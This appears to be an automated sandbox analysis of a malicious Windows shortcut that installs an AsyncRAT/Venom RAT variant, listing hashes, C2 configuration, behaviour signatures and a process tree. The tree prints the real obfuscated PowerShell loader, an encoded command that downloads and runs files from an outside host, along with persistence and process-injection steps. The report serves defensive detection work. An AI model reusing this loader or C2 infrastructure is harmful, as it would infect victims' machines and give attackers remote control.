Analysis
- max time kernel: 93s
- max time network: 144s
- platform: windows10-2004_x64
- resource: win10v2004-20240709-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/07/2024, 06:04
Static task: static1
Behavioral task: behavioral1
Sample: 0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
Resource: win7-20240705-en
General
- Target: 0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
- Size: 2KB
- MD5: 7e7b20e421442d74655685583b4036de
- SHA1: cf936b1fe122c6a5029c07a64a0f8674b31464af
- SHA256: 0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1
- SHA512: e58df7f695e08bc57c30a518f35c84b9ab70597696d579291b12c2534a06b24018920cd09f4a0652dcca9791eca207646e4ce38f03bf3650c093a8db9ffe9318
Malware Config
Extracted
- Family: asyncrat
- Version: Venom RAT + HVNC + Stealer + Grabber v6.0.3
- Botnet: Default
- C2: 64.112.85.3:4449
- Mutex: ufaaryvntrlyhwcwq
- delay: 1
- install: false
- install_folder: %AppData%
Signatures
- Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  16 | 4336 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  pid | Process
  4336 | powershell.exe
  4076 | powershell.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation | WScript.exe
- Drops startup file (1 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myscript.lnk | WScript.exe
- Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 4076 set thread context of 804 | 4076 | powershell.exe | 92
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings | powershell.exe
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid | Process
  4336 | powershell.exe
  4336 | powershell.exe
  4076 | powershell.exe
  4076 | powershell.exe
  804 | aspnet_regbrowsers.exe
  804 | aspnet_regbrowsers.exe
  804 | aspnet_regbrowsers.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 4336 | powershell.exe
  Token: SeDebugPrivilege | 4076 | powershell.exe
  Token: SeDebugPrivilege | 804 | aspnet_regbrowsers.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  pid | Process
  804 | aspnet_regbrowsers.exe
- Suspicious use of WriteProcessMemory (16 IoCs)
  description | pid | Process | procid_target
  PID 1156 wrote to memory of 4336 | 1156 | cmd.exe | 84
  PID 1156 wrote to memory of 4336 | 1156 | cmd.exe | 84
  PID 4336 wrote to memory of 532 | 4336 | powershell.exe | 88
  PID 4336 wrote to memory of 532 | 4336 | powershell.exe | 88
  PID 532 wrote to memory of 2148 | 532 | WScript.exe | 89
  PID 532 wrote to memory of 2148 | 532 | WScript.exe | 89
  PID 2148 wrote to memory of 4076 | 2148 | cmd.exe | 91
  PID 2148 wrote to memory of 4076 | 2148 | cmd.exe | 91
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
  PID 4076 wrote to memory of 804 | 4076 | powershell.exe | 92
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
   PID: 1156
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
  2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
     Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$avesqBoj49s = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC9PekZMLnBkZiAtT3V0RmlsZSAkZW52OlRFTVBcT25saW5lIEJhbmtpbmcgUGF5bWVudCBBZHZpY2UucGRmLnBkZjtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxPbmxpbmUgQmFua2luZyBQYXltZW50IEFkdmljZS5wZGYucGRmO1N0YXJ0LVNsZWVwIC1zIDM7U3RhcnQtU2xlZXAgLXMgMztTdGFydC1TbGVlcCAtcyAzO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvTnBsLmpzIC1PdXRGaWxlICRlbnY6VEVNUFxWeEl0RVQuanM7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcVnhJdEVULmpzOyRhaD0nWWV4cjc0SFhXNkRpJztFeGl0';$EtRpa8h = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($avesqBoj49s));Invoke-Expression -Command $EtRpa8h"
     PID: 4336
     - Blocklisted process makes network request
     - Command and Scripting Interpreter: PowerShell
     - Modifies registry class
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious use of AdjustPrivilegeToken
     - Suspicious use of WriteProcessMemory
    3. C:\Windows\System32\WScript.exe
       Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VxItET.js"
       PID: 532
       - Checks computer location settings
       - Drops startup file
       - Suspicious use of WriteProcessMemory
      4. C:\Windows\System32\cmd.exe
         Command line: "C:\Windows\System32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1""
         PID: 2148
         - Suspicious use of WriteProcessMemory
        5. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
           Command line: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1"
           PID: 4076
           - Command and Scripting Interpreter: PowerShell
           - Suspicious use of SetThreadContext
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of AdjustPrivilegeToken
           - Suspicious use of WriteProcessMemory
          6. C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
             Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
             PID: 804
             - Suspicious behavior: EnumeratesProcesses
             - Suspicious use of AdjustPrivilegeToken
             - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- Filesize: 254KB
  MD5: 2ab59c5bd94c0fd78986c451fc0d649f
  SHA1: 3e58b73c0c7ec71ffeb6ab1a09a6d6b2f6717f46
  SHA256: 5f0cfa1a3d66bc1e0affb028ba335f5c89f0cb684b59933d0e55f6ed75efc075
  SHA512: cfd9fd56e3503ba35f6b373df8cd725957641cb45b64f54aa0cd4d5eb3ede53d1dbc9f0965c635f1566686b8331356c239ab5242586473755e5b611517745b74
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 250KB
  MD5: 85a84eff8bf73e4661824726438e21ee
  SHA1: a2b5401bbe15125c0d8d9419d87425366c991fa8
  SHA256: 78e20b9f9e36578c45d1c0e28e68299620ce085953ab3e468ab10f633e586cfc
  SHA512: e93cb30222036ef2f47dc27cc3d4c6195e6c57d12728e4955707dba69d38b469a0e7242729cebe3d59afe312c3db5bdf20e623ea939ba7f8085d9435b14bcfb0